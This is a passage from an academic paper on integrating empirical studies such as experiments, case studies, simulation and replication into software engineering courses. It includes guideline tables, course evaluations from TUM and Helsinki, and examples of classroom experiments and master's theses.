domain knowledge beyond the more general knowledge they acquire at university. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 13/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Examples of individual studies in teaching Rein & Münch (2013) describe an individual student study that was performed as part of a seminar thesis. The study aims at analysing features of a mobile app and consisted of design, instrumentation of the app with appropriate measurement instruments, and analysis of data from more than ten thousand users. The study results provided valuable, data-based justifications on how to further develop the app. In addition, a new method for analysing feature value was piloted and experiences with the applicability of the method were gained. A popular example for individual studies in industry is the so-called Personal Software Process (PSP), a training that consists of a series of systematically defined software engineering exercises. Rombach et al. (2008) have analysed data from 3,090 engineers conducting the PSP. A major finding from this analysis is that the effects of applying software engineering principles can be experienced on an individual level. Although the effects of applying such principles typically can only been seen on the larger scale (e.g., large projects, long-lasting development efforts, multi-team developments), this study shows that it is possible to teach these principles also on the individual level. Further instruments In the previous sections, we provided an overview of different empirical instruments, a discussion, and examples of their application in teaching. However, there are further means that can contribute to the aforementioned study types. Replication studies Replication provides an opportunity to learn from an already established research design, and can, if conducted well, contribute additional evidence for a research question. Replication repeats empirical studies to solidify their results, test result reproducibility, increase result validity (e.g., Easterbrook et al. (2008) and Park (2004) consider replication a kind of triangulation), and broaden research context and scope by repetition under similar conditions while changing selected variables, e.g., site, population, and instruments. Thus, students can learn from adapting the research design in a new environment and by comparing the results obtained to those of the original study. Simultaneously, teachers should prepare students for sometimes large differences in results. Lack of generalisability is often cited as a limitation in empirical studies and replication is a step toward creating generalisable knowledge. However, replication in software engineering is considered immature and is subject to debate. Juristo & Gómez (2012) argue that results from current software engineering experiments are often produced by chance, are artificial, and are too far away from reality. They mention that the key experimental conditions are yet unknown, as the tiniest change in study design may lead to inexplicable results. Due to the large number of varying factors in the context of software engineering, it can be questioned whether close replication is possible at all (Juristo & Vegas, 2011). Nevertheless, conducting a replication can be a valuable learning experience which develop students’ ability to design studies and critically compare results of studies addressing the same or similar questions. Although industry-based research is considered the optimal way to gather reliable and relevant data, empirical research in industry is hard; replications are even harder. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 14/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 For instance, as we discussed in Kuhrmann (2015), small companies usually have limited resources to conduct empirical research, as it requires preparation, time, and allocation of resources. Armbrust et al. (2008) mention the importance of pilot projects in the context of case study research, and discuss the difficulties finding proper projects and allocating resources. Replication increases the level of difficulty, as experiments and case studies are conducted multiple times thus blocking critical resources for long periods of time without immediately creating value in terms of products and services. While replication in industry is hard to implement, replicated experiments and case studies are easier to realize in education since universities provide a stable environment. Deviations from original designs are usually the subjects, while, e.g., case, instruments, and procedures can be kept stable. Thus, once a consolidated experiment design is in place, replications can be implemented on a regular basis. However, the question of whether results obtained with student subjects can be generalised to industry is then of crucial importance. Real-life examples and open source software A major challenge for teachers is providing students with problems of considerable size. One approach is to rely on Open Source Software (OSS) projects with many publicly available cases, problems, and code to investigate. They offer complex challenges going beyond typical local, university-driven projects. OSS projects are distributed and decentralised, utilising virtual teams in which participants can range from individual volunteers to professional development teams employed by a company. Furthermore, the practical relevance of OSS software is unquestioned, since OSS projects set de facto standards for software development in certain application domains, e.g., operating systems (Linux), web servers (LAMP stack), and mobile ecosystems (Android). Participating in OSS can benefit industry by leveraging development capacity for projects exceeding their own capabilities. In many cases, they must participate in OSS and build products on OSS platforms in order to access customers who are already using them. Learning how to function in this context, e.g., working in a self-organising virtual team requires particular knowledge and skills. Therefore, OSS projects are fruitful grounds to set up a sophisticated teaching environment. Individual students could directly participate in a single project and investigate a specific problem, or, in order to achieve more demanding learning goals, groups of students participate through a collaborative program (Richardson, Milewski & Mullick, 2006; Keenan, Steele & Jia, 2010). For instance, students from several universities can participate in a common project pool (e.g., Fagerholm et al., 2014b; Fagerholm, Oza & Münch, 2013). From the industry perspective, OSS projects offer increased visibility and opportunities for recruitment, contribution to added features, and sustainability of key OSS components. From the teaching perspective, OSS projects provide a realistic learning experience with large software systems, and allow experiencing many aspects of collaborative software development. For researchers, OSS projects have a large amount of data available, with easier access than from companies’ internal projects. Data from OSS projects has been used for several purposes including improvement of teaching. Other data sources are also available for analysis, providing evidence-based means to improve teaching. An emerging trend is using learning analytics for supporting good Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 15/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 learning outcomes, to better understand learning progress, and to construct student profiles for tailored teaching. Ideally, this can allow real-time reaction to improve learning outcomes and to allow larger masses of students to participate in courses with limited teaching resources. The main benefits are, for instance, to address the drop-out problem and to provide more customised teaching for individuals. At the University of Helsinki, an example of a platform allowing learning analytics is the mooc.fi online learning environment, which provides courses on cyber security, programming in several languages, web service development, and algorithms. Research on the platform has, for instance, contributed methods to identify students based on typing patterns (Longi et al., 2015), which can help prevent cheating in an online environment, and to identify students in need of assistance, which allows increasing guidance for struggling students early on, and providing more challenging assignments for high-performing students (Ahadi et al., 2015). A GUIDELINE FOR INTEGRATING EMPIRICAL STUDIES WITH SOFTWARE ENGINEERING COURSES In this section, we develop an experience-based guideline to integrate empirical studies with software engineering courses. We base the guideline on experiences gathered from our own software engineering courses, categorised from several perspectives. We first generalise common purposes, challenges, and validity considerations. These serve to determine the appropriateness of a particular study in a given context. We discuss appropriateness from two perspectives: (1) teaching at universities and (2) industry training. Finally, we share our experiences, discussing several aspects to be considered when integrating empirical studies with software engineering courses, e.g., motivation, scheduling, and effort. Purposes, challenges, and validity To summarise the aforementioned kinds of empirical studies, we create the taxonomy presented in Tables 2–4. In this initial taxonomy, we include different purposes, challenges, and validity constraints to support the categorisation of study types, and the analysis of appropriateness in certain contexts. We identified a total of ten purposes, describing major learning goals associated with empirical studies in software engineering teaching that we consider important (Table 2). Complementing the purposes, we identified eight challenges that should be taken into account when designing empirical studies for educational purposes (Table 3). Purposes and challenges are intended to help teachers determine what study type is appropriate in a certain setting, e.g., does the actual setting allow for a (full) experiment, and if so, what challenges need to be addressed? Apart from purposes and challenges, the quality of the outcomes of empirical studies— especially in the context of teaching using students as subjects (Runeson, 2003)—must be considered carefully. Taking the close relation to industry and relevance of the topics into account, we analysed the different study types for validity constraints. For example, researchers seek validity to solidify findings and to pave the way for generalisable knowledge, while industry is interested in business value. Furthermore, from a teaching perspective, result validity may be considered less important than achieving the learning goals. Therefore, we derived four validity considerations associated with empirical studies Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 16/36 https://peerj.com http://mooc.fi/ http://dx.doi.org/10.7717/peerj-cs.131 Table 2 Summary of learning goals and purposes for empirical studies in education. Purpose Description P01 Learn to formulate a research problem. Students face a (real-world) problem that needs investigation. Therefore, the learning goal is to: •Capture the problem. •Formulate research questions. •Formulate hypotheses regarding users or customers and their behaviour. Due to the complexity of realistic, real-world settings, this task is demanding for, e.g., formulating a problem in a scientifically sound way, but keeping in mind the (industry) partners’ needs. P02 Learn to collect relevant data. Collecting data in realistic settings is a demanding task, as data is usually scattered across different sources. The learning goal is to develop a meaningful data collection strategy that includes data from multiple sources within a setting and, optionally, backed up by further external data (from outside a given setting). P03 Learn to analyse real-life data. Real world situations are often incomplete or confidential thus hampering data analyses. The learning goal is to develop a data analysis strategy to overcome limited data. P04 Learn to draw conclusions. Based on collected and analysed data, the overall learning goal is to draw conclusions. Thus, in the (realis- tic) setting, students need to learn to: •Gather empirical evidence on which conclusions are based. •Test theories and/or conventional wisdom based on evidence. •Draw conclusions from (limited) data and develop a strategy to utilise findings in practice. The purpose is to gather findings or evidence, and to analyse the findings for relevance in the respective setting. Eventually, findings must contribute to solving the original problem and, thus, another learning goal is to develop transfer strategies to support utilisation of the findings in practice. P05 Learn to experience and solve a specific problem. A major purpose is to cause people to experience certain situations and to develop situation-specific solution strategies or approaches. This leads to: •Experience regarding the problem-solution relation, e.g., understanding of the relationship between user behaviour and software design. • Increased knowledge about a problem (domain). • Increased knowledge about technology and methods. • Increased knowledge about potential/feasible solutions and/or solution patterns. Skills addressed by this learning goal are basic prerequisites that allow for developing solutions in general, as these skills address a specific problem, but also allow for developing transferable knowledge that can be applied to different contexts. P06 Develop a software artefact. In software engineering, software artefacts, especially prototypes, serve the (early) analysis of a specific problem. For this, prototypes allow for implementing and demonstrating solution strategies. The learning goal thus comprises: •Create a (software) prototype to demonstrate a solution approach/strategy (feasibility study). •Create artefacts to elaborate potential solution approaches/strategies for dis-/advantages (comparative study). •Create artefacts to establish (quick) communication and feedback loops. Software artefacts in general and prototypes in particular serve the elaboration of a problem, and help to understand the potential so- lutions. That is, such artefacts pave the way to the final solution. P07 Coaching. Another learning goal is to make stakeholders familiar with new methods and tools. Hence, utilisation of the new method- s/tools need to be trained, i.e., develop and train necessary skills. P08 Change of culture. Continuous experimentation comprises a number of the other learning goals. However, continuous experimenta- tion is more of a general organisational question than a project-specific endeavour. Therefore, utilising continuous experimentation also implies a cultural change toward experimentation in the implementing organisation. P09 Learn about the impact. Specific behaviour or decisions impact a system and/or a team, e.g., changing requirements or fluctuation in team composition. Therefore, it is important to learn about the effects that certain behaviour and decisions have in large and/or dy- namic contexts. P10 Learn about long-term effects. Apparently ‘‘local’’ decisions might cause ‘‘global’’ effects. Thus, it is important to know about the long- term and/or snowballing effects caused by single decisions, e.g., a shortcut in the architecture leads to increased maintenance cost (technical debt). Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 17/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 3 Summary of challenges that empirical studies in education face. Challenge Description C01 Finding or creating relevant cases. The major challenge is to find and define proper and relevant cases, which bears some risks: •A case may become irrelevant while conducting a study (e.g., changing environment, changing context parameters). •A study might go into an unexpected direction (learning curve and, in response, focus shift). •A relevant case must be narrowed down to the participating subjects, e.g., students have different skills and goals than professionals. Cases must be balanced, e.g., learning goals must be achieved regardless whether the original case loses its relevance (procedural over technical knowledge) or students need to finish a thesis regardless of whether industry partners can apply study findings. C02 No guaranteed outcome. If a problem was found, there is no guarantee that a study will lead to an outcome. Furthermore, immediate applicability of the outcomes is not guaranteed, which means extra work for industry to transfer results into product development. C03 Time constraints. Apart from the appropriateness of the actual problem, time constrains limit the study. Time constraints can occur as: •Limitations dictated by the curriculum/course schedule. •Limitations dictated by industry schedules, e.g., product development cycles. •Limitations dictated by individual schedules, e.g., students that are about to finish their studies. Therefore, time constrains, together with resource limitations, define the basic parameters that affect the study objects (problem, po- tential/achievable solutions, completeness of results, validity of outcomes, and so forth). C04 Resource limitations. Studies require resources and, thus, availability of resources limits the study. Resource limitation can occur as: •Availability of (the right) students, e.g., if a study requires students with a specific skill profile. •Motivation of students to participate in a study (personal vs. study goals). •Availability of industry resources (personnel tied to a study). •Options to adequately integrate the study with (running) company processes. Especially the availability is a critical factor. For instance, while one experiment consumes resources once, repetition and replication require a long-term commitment regarding resource availability, which implies significant investments of time and/or money. In or- der to make resources available, participating partners need to receive a sufficient benefit, which is often hard to define in empirical studies. C05 Limited access to data. Although it is one purpose in terms of learning goals, defining adequate hypotheses and variables that can be investigated in a course is challenging. Proper measurements must be defined, taking into account that potentially not all data is available, e.g., confidential data. Especially access to user data is challenging (a way out could be utilising OSS projects), as this data is usually strictly confidential. C06 Built-in bias. A special problem is bias. Each particular setting comes with an inherent set of biases, e.g.: •Students’ special skills affect the study, and students that are trained in advance of the study affect the outcomes. •Too much or too little context knowledge of the subjects affects the study. •Competing goals of the participants (especially students vs. practitioners) affect the study, e.g., students might try to optimise a study to achieve better grades while compromising the study goals. Empirical studies suffer from certain limitations, and in the context of teaching, special attention needs to be paid to bias and threats to validity. C07 Communication. Empirical investigations create knowledge, data, and potentially software artefacts. Therefore, results need to be quickly communicated to the participants. Quick feedback helps to, e.g., determine the relevance of results, appropriateness of the in- strument, and determining necessary adjustments. Thus, fast feedback loops are necessary. C08 Creating a Simulation Model. For simulation-based research/teaching, setting up a simulation model is a demanding task, which con- sumes time and resources thus generating cost. The entire domain under consideration must be captured to create a model that al- lows for generating useful data. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 18/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 4 Summary of validity considerations when using empirical studies in education. Validity consideration Description V01 Emphasis: meeting teaching goals. Use is valid if procedural learning goals are met. Validity of conclusions and useful- ness for industry are of secondary importance from the teaching perspective. V02 Emphasis: meeting business or organisational goals. Validity depends on what value is created for the business. Direct business value is rare; a more likely result is increased knowledge of the problem area, technology, work methods, or potential solutions or solution patterns. V03 Emphasis: creating a sound study design. Focus is on the internal validity, and results of a study are ‘‘side effects’’. If the learning goal is to understand experimentation itself, internal and external validity could have higher relevance. V04 Emphasis: meeting research goals. Especially in simulation, the validity of the gathered data depends on the quality of the simulation model, and also on the quality of the simulation environment. for teaching from the desired learning outcomes and our knowledge about the educational context (Table 4). Establishing context and goals, and determining a study type We provide an initial assignment to the four major study types experiment, case study, simulation, and continuous experimentation. Individual studies are left out, since the particular challenges result from the concrete instrument applied in the respective study, e.g., an individual study may implement an experiment or a case study. Table 5 provides an initial assignment of purposes, challenges, and validity constraints from the academic perspective, while Table 6 provides the industry perspective. The tables support decision-making when selecting appropriate instruments. For instance, if the context is university, and students shall learn to solve a particular problem (P05) by developing a software tool (P06), teachers should opt for a case study. In an industry context, both case studies and experiments can be utilized. However, as Table 6 illustrates, an industry experiment is more demanding, with more challenges to address, e.g., built-in bias (C06) and communication (C07), and a different validity emphasis (V02). Another observation is that there are no differences suggested between the two settings in the case of the simulation instrument. In both, the major challenge is the simulation model, which affects learning, effort for its creation (C08), and validity constraints (V04). Concrete goals must be considered and balanced alongside contextual information when selecting a particular study type. This also includes goals going beyond classic learning goals. For instance, all stakeholders (students, teachers, and industry partners) come into contact when performing case studies in industry, allowing for several opportunities. Students make contact with industry and could find a job. Students team up with other students to create an idea which may eventually lead to the founding of a company. On the other hand, industry can conduct research cheaply, as they usually pay with time spent, sponsor an idea, or pay a small fee to keep a software engineering lab running. In either case, industry gets access to the latest knowledge and fresh resources. Finally, researchers have the opportunity to conduct some research (given the limitations mentioned above). Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 19/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 5 Education in academia/university. Experiment Case study Continuous experimentation Simulation Purpose P01, P03, P04 P01, P02, P03, P04, P05, P06 P01, P02, P03, P04 P09, P10 Challenges C01, C03, C04, C05 C01, C02, C03, C04, P05 C01, C03, C04, C05 C01, C05, C08 Validity V01 V01, V02 V03 V04 Table 6 Education in industry. Experiment Case study Continuous experimentation Simulation Purpose P04, P05, P06 P05, P06 P02, P03, P06, P07, P08 P09, P10 Challenges C01, C03, C04, C05, C06, C07 C01, C02, C03, C04 C03, C04 C05, C07 C01, C05, C08 Validity V02 V02 V02 V04 Motivating students to conduct empirical studies Making contact with industry and the prospects of finding a job or starting a company, foster students’ motivation to actively participate in courses, and may contribute to higher motivation, engagement, and better understanding of course contents. For instance, in Kuhrmann, Fernández & Münch (2013), we reported on a new teaching format applied to a software process modelling course, including an empirical study. The course evaluation showed that students experienced the course significantly better than the class before (without the study), although they perceived the course as more demanding (see ‘Example 1: a course on software process modelling with and without experiments’). The evaluation showed that students understood contents and their relevance better, gathered advanced knowledge and learned to apply it experiencing practical effects, e.g., consequences of wrong design decisions. Our experience also shows that encouraging students to develop ideas and create products boosts motivation (c.f. Brügge, Krusche & Alperowitz, 2015). For instance, smart phone apps can be developed in collaboration with industry partners and published in an app-store. Gaining visibility, real clients, real feedback, and real bug reports guides students through the whole software development and product life cycle. Nevertheless, apart from all potentially positive motivating drivers, a major driver for students is to get the best possible grade. Also, the number of credits must reflect the effort required to conduct the study. For students, the amount of time required to receive a credit point is an important consideration. Since empirical studies are demanding in terms of effort, and credits form the compensation, software engineering courses that include empirical studies must adequately ‘‘remunerate’’ the students for their efforts. Scheduling Having defined the goals and acquired (motivated) students and, optionally, partners from industry, the challenges C03 and C04 (Table 3) must be addressed. Planning empirical studies in a standard university curriculum is demanding, as students usually take several courses thus having limited resources. Furthermore, courses often span 12–15 weeks and if industry is involved, their schedules must be respected as well. In Kuhrmann (2012), we Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 20/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 provided a generic template that integrates classic teaching with explicit workshop slots, which can be used to conduct empirical studies. In Kuhrmann, Fernández & Münch (2013) and Kuhrmann, Femmer & Eckhardt (2014), we provided concrete instances and reported on the feasibility of the proposed template. However, conducting empirical studies in collaboration with industry requires refining the generic template. We consider three basic planning patterns appropriate: • Workshop model: In the workshop model, teachers, students, and practitioners conduct a workshop in which they collaboratively work on a problem. An example is a lab-based environment, such as the Software Factory (Fagerholm, Oza & Münch, 2013). Moreover, the workshop model is quite common in industry training (usually 1–5 days); a study that fits that schedule is more likely accepted by industry partners. • Interleaved model: The interleaved model allows conducting a ‘‘long-running’’ study. Normal work slots alternate with workshop slots, e.g., a new method is deployed and trained, practitioners apply it, researchers evaluate, improve and/or train new aspects of it, practitioners continue application, and so forth. Furthermore, this model proved beneficial when supervising students conducting individual studies in industry. There are several benefits: regular work is not disturbed over a long period; training can be done iteratively; and cases can be observed over a longer time period. However, course schedules limit the applicability with student groups. • Observation model: This model is the classic research model adopted for education purposes. Students or practitioners are instructed, work independently on a task, and get coaching from teachers. Besides the coaching, teachers monitor the correct application of empirical methods to collect and analyse data. Planning the study and justifying the study plan with all time constraints needs to be done carefully, and requires the commitment of all participants to ensure availability of personnel and resources. Further study type selection criteria Apart from the criteria already discussed, we wish to highlight some further criteria that may influence the selection of study types for educational purposes. First, in Table 7, we summarize well-known criteria from literature (e.g., Wohlin et al., 2012) and further criteria that we consider relevant for study type selection. The table includes an experience- based rating for the criteria. However, this rating has to be considered as a subjective recommendation, as it is hard to precisely define, e.g., the degree of motivation or student satisfaction. We note that the knowledge and skill level of students should also be taken into account when selecting and tailoring an empirical instrument for teaching. In Table 8, we provide an experience-based assessment of how different study types can be adjusted for different levels of students. Two student levels are considered: Bachelor’s (0–3 years of study) and Master’s (3–5 years of study) levels. In industry, these may be interpreted either based on employees’ level of education or their working experience in the field. The primary means of adjustment is selection of a suitable problem scope and setting expectations for Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 21/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 7 Further study selection criteria for different study types. Each study type is ranked relative to the others on three levels and may span more than one level (LO: low, ME: medium, HI: high). Experiment Case study Continuous experimentation Simulation Individual studies LO ME HI LO ME HI LO ME HI LO ME HI LO ME HI Degree of execution control × × × × × × × × Degree of measurement control × × × × × × × × Degree of validity × × × × × × × × × × Motivation to participate in a study × × × × × × × × Motivation created by the study × × × × × × × × × Student satisfaction × × × × × × × × × Scheduling effort × × × × × Ease of goal definition × × × × × × × × × Effort to prepare/conduct a study × × × × × Fagerholm etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.131 22/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 8 Adjusting study types to student levels. Length of study is indicative and based here on European standards. Bachelor’s level (first 3 years of study) Master’s level (between 3–5 years of study) Experiment Simple experiments with few variables. Ex- periment design given. More complex multivariate experiments. Own experiment design. Case Study Limited topics, restricted to chosen context, few informants. Little or no generalisation. Exploratory, descriptive or intrinsic case studies. Topics related to well specified software en- gineering areas. Some generalisation. Limita- tions of generalisation fully analysed. All case study types. Continuous Experimentation Rudimentary practice with synthetic sce- narios. Focus on understanding basic steps such as identifying assumptions, creating hy- potheses, and collecting data. More advanced scenarios or limited real-life experiments. Focus on drawing conclusions from data and understanding limitations. Simulation Using ready-made simulation models and given data to explore topics through simula- tion. Exploring the effect of changes in models us- ing given data or how ready-made models be- have with student-collected data. Some ex- ploration with creating simulation models. Individual Studies Focus on finding and summarising existing research. Focus on answering specific research prob- lems by applying existing research and own data collection. No requirement of scientifi- cally novel results. appropriate result scope. For example, case studies at the Bachelor’s level can be more limited in scope and focus on exploratory, descriptive, or intrinsic designs without much generalisation beyond the case environments. On the Master’s level, some generalisation can be expected although still limited. Assessment of the possibilities to generalise can be expected at this level. This assessment must be considered as a subjective starting point for adjustment, as students are different and educators should, as far as possible, tailor courses for individuals in order to provide the best opportunities for learning. EXPERIENCES In this section, we provide some experiences gathered from implementing empirical instruments in university teaching. We provide selected examples, outline the respective courses (purpose, approach, outcomes), and provide feedback and evaluation (formal as well as informal) to reflect the students’ perception of these courses. Example 1: a course on software process modelling with and without experiments A course on software process modelling, which implements the curriculum presented in Kuhrmann, Fernández & Münch (2013), serves as first example. The course was offered multiple times at the Technische Universität München (TUM) and the University of Helsinki. In Munich, after the initial run, the course was reorganized according to the concept presented in Kuhrmann (2012) in which we presented an approach to integrate experimentation with practical Software Engineering courses. Due to the reorganization, students experienced the (abstract) topics while conducting a controlled experiment on which we reported in Kuhrmann, Fernandez & Knapp (2013). Moreover, due to the Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 23/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 1Note that in Table 9, smaller scores are better. 2Since we informed the students about the ‘‘experimental’’ character of this special course in advance, the students did not complain, but welcomed the opportunity to give the feedback to improve their own class. Table 9 Formal evaluation (anonymous questionnaire, comparison winter 2010/2011 and 2011/2012, TUM, result interpretation: ↑ large im- provement, 1, small improvement; →, no change; ↘, small deterioration; ↓, large deterioration.) Criterion Winter 2010/2011 Winter2011/2012 Result Number of completed questionnaires 6 (9 participants) 8 (14 participants) – Common criteria (1 = very high, 5 = very low) Complexity 3.00 (old questionnaire: ‘‘level’’) 2.38 −0.62↑ Volume 2.12 −0.71↑ Speed 2.83 (old: one question) 2.75 −0.08→ Appropriateness of effort compared to ECTS points n.a. 3.00 n.a. Overall rating (1 = very good, 5 = very bad) Lecture 1.25 1.5 +0.25↘ Exercise 2.17 1.33 −0.84↑ Relation to practice 2.0 1.62 −0.38 1 repeated execution in which we applied a course structure both without and with empirical instruments, we can present a number of experiences and a comparison. Formal evaluation In Table 9, we present the comparison based on the formal course evaluations conducted by the Faculty of Informatics at TUM. Due to updated questionnaires, the evaluations are not directly comparable. However, the basic information can still be extracted. The formal evaluation shows a significant increase of the scores1 regarding exercise quality and relation to practice, although, at the same time, the students also see the lecture as more demanding. Since the basic course contents did not change, we interpret this evaluation as an increased awareness toward the course topic, which might be caused by the stronger utilization of practical aspects through the experiment. We see this as an indication that introducing experiments could have a positive effect, although a full validation is missing. Informal evaluation Besides the formal faculty-driven evaluation, we also performed two informal feedback rounds in the course instance in which we adopted the empirical instruments. We asked the students to write a one-minute-paper that contained the following three questions to be answered in short words: 1. (up to 5) points that are positive 2. (up to 5) points that are negative 3. (up to 5) points that I still wanted to say (informal) Table 10 shows the summarized results from the informal evaluation: The structure of the class, the selected topics, the combination of theory and practice, and the way of continuously evaluating the work and finding the final grades were rated positively. Especially the practical projects and the team work in the workshops were highlighted. On the other hand, students mentioned the tough schedule and the not always optimal tailoring of tasks2 for the practical sessions. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 24/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 3In the Star Trek franchise, Kobayashi Maru is a leadership test with a no-win scenario; see https://en.wikipedia.org/wiki/ Kobayashi_Maru. Table 10 Summarized evaluation of the one-minute-papers (winter 2011/2012, TUM). Positive Aspects Structure of the topics and the class, Combination of theory and practice, Projects in teams (atmosphere), Self-motivation due to presentations, Continuous evaluation and finding of the final grades Negative Aspects Tough schedule, Tailoring of the tasks for the practical sessions was not always optimal Students signed off, just because of the examination procedure Informal ‘‘Thank you, this was the lecture I learned the most.’’ ‘‘Super class, and I loved those many samples from practice.’’ Example 2: a course on agile project management and software development with experiments The second example is an advanced course on agile software project management, which is also grounded in the general course pattern presented in Kuhrmann (2012). A detailed description of the course and data obtained from the experiments is provided in Kuhrmann, Femmer & Eckhardt (2014). In this course, offered at the Technische Universität München, the main purpose of the experiment instrument was to create awareness—scientific results were not the objective. We implemented two experiments: Experiment 1 (Group Dynamics) The first experiment aimed at demonstrating how groups of people collaborate in teams under stress (Kuhrmann & Münch, 2016b). Therefore, we introduced the Tuckman Model (Tuckman, 1965), which describes group formation processes, and designed a simple experiment in which the students had to sort sweets and to document the outcomes. During the different experiment runs, we put some pressure on the students, e.g., increasing task complexity, enforced turnover, and external disturbances. Although this experiment did not aim at finding new scientific revelations, we could confirm the Tuckman Model and show that group performance suffers from turnover. Experiment 2 (Distributed Development) The second experiment was designed to give the students the opportunity to deal with hopeless situations (Kuhrmann & Münch, 2016a): we designed a Software Engineering ‘‘Kobayashi Maru’’ test.3 Students were separated into two sets, each consisting of two groups for a total of four groups. Each group had to develop a very simple console-based chat application (requirements in the form of user stories and test cases were provided), the groups were separated (each was located in a separate room), and each group was allowed to use only one communication channel (e-mail and Skype respectively). After the task had been presented to them, the groups were immediately separated to avoid any direct communication, and for each group, a researcher monitored the compliance to the experiment rules. As the students Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 25/36 https://en.wikipedia.org/wiki/Kobayashi_Maru https://en.wikipedia.org/wiki/Kobayashi_Maru https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 11 Formal evaluation (anonymous questionnaire, winter 2012/2013, TUM). Criterion Winter 2012/2013 Number of completed questionnaires 15 (19 participants) Common criteria (1 = very high, 5 = very low) Complexity 3.27 (just right) Volume 2.93 (just right) Speed 3.07 (just right) Appropriateness of effort compared to ECTS points 3.07 (just right) Overall rating (1 = very good, 5 = very bad) Lecture 1.33 Exercise 1.40 Relation to practice 1.57 Table 12 Summarized evaluation of the one-minute-papers (winter 2012/2013, TUM). Informal ‘‘Course discusses topics of interest from practical point of view.’’ ‘‘I like the practical approach of teaching.’’ ‘‘By far one of my favorite courses at all. Very interactive and relaxed atmosphere. Great exercises.’’ ‘‘Interactive, student presentations, experiments.’’ ‘‘Applicability of the course immediately in my work for other software projects.’’ did not have the chance to initially find some agreements, the projects were failures-by- design. The students immediately started to work (they had only 90 min to develop the working software), yet, nobody came up with the idea to negotiate a communication protocol first. Therefore, after the deadline, no group could show any working software. In a closing feedback session, we revealed the nature of the experiment and discussed the observations. Formal evaluation In Table 11, we present the comparison based on the formal course evaluations conducted by the Faculty of Informatics. Although we have only one evaluated instance of this course, we use the same structure as in Table 9 to present the data. The evaluation shows this course to be on approximately the same level as the improved software process modelling course. Informal evaluation Besides the formal faculty-driven evaluation, we again performed two informal feedback rounds in the course. We asked the students to write a one-minute-paper (see above). Since the outcomes are actually the same as already presented in Table 10, we only present the informal comments (third question) in Table 12. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 26/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Example 3: master’s theses using a case study approach Master’s theses provide opportunities for individual students to apply a specific research approach to a chosen problem. The third example comes from a selection of Master’s thesis projects which we have supervised at the University of Helsinki, all of which use a case study approach. They are therefore examples of both individual studies and case studies. The first thesis project investigated a software prototype game and applied usability and user experience evaluation methods to determine whether it fulfilled two sets of criteria: the entertainment value of the game, and the ability to tag photos as a side effect of playing the game. The game itself was implemented by a student team in cooperation with a company, and the thesis writer was part of the implementation team. In this thesis, the game constituted the case and four sources of evidence were used: user interviews, in-game data collection, a questionnaire, and observations from a think-aloud playing session. The thesis can be characterised as an intrinsic case study (Stake, 1995; Baxter & Jack, 2008), since the objective was not to gain understanding of an abstract construct or general phenomenon, nor to build a theory. Rather, the case itself was of interest, and the results were suitable for making further decisions regarding development of a full game based on the prototype. The second thesis project investigated continuous delivery and continuous experimentation in the B2B domain. The objective was to analyse challenges, benefits, and organisational aspects in a concrete company case. The thesis writer was an employee in the company and was thus a participant observer. In this thesis, the case consisted of the development process used by two teams for two separate software products. Two sources of evidence were used: participant observation and interviews with 12 team members, six in each of the two teams. The thesis can be characterised as an exploratory deductive case study, where the aim was to explore how continuous delivery and continuous experimentation could be applied in the company and what challenges and success factors are encountered. The thesis aimed to generalise and provide results that could be adapted to other B2B companies. The third thesis project investigated the state of the practice of experiment-driven software product and service development. The objective was to understand the state of the practice of continuous experimentation and to identify key challenges and success factors in adopting continuous experimentation. The thesis can be characterised as a qualitative survey design, which resembles a case study but relies on a single source of evidence. In that sense, the thesis was close to an intrinsic case study, as it aimed to develop a multifaceted understanding of the topic rather than develop theory. The thesis used material from 13 interviews in 10 software companies. The result of the thesis was a rich picture of the state of the art concerning experiment-driven software development in the case companies. Although the primary aim was not to generalise, the results were relevant as comparison points in other companies. Informal evaluation Utilising a case study approach in the Masters’ theses provided the opportunity to investigate highly relevant problems in their natural context. Each thesis gained from Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 27/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 having an industrial connection which provided real-life constraints, questions, and data. In each thesis, the student had to consider the setting, objectives, questions, methods, data collection, and analysis procedures and adjust the general case study research method to their particular implementation. We observed high motivation among the students, timely completion of subtasks and of the thesis as a whole, and clear maturation with a complex individual project. Two of the theses were developed into scientific papers that have been published in peer-reviewed forums. Based on these examples, the difficulties related to case studies can be summarised into three categories. First, finding and scoping a relevant research problem can be difficult for many students, as they do not have the necessary overview of the present literature that is needed. The role of the advisor is of prime importance in the beginning: helping to formulate the research questions and pinpoint what the case or unit of analysis is. Second, understanding case study research as a method can take a long time without proper guidance. Providing relevant method literature, identifying the key concepts, and providing an understanding of how to implement the method in practice —designing the study—are areas where the advisor can help. The data collection is usually interesting and straightforward, perhaps with some practical challenges related to finding data sources. As these can often be overcome by some persistence, the third category 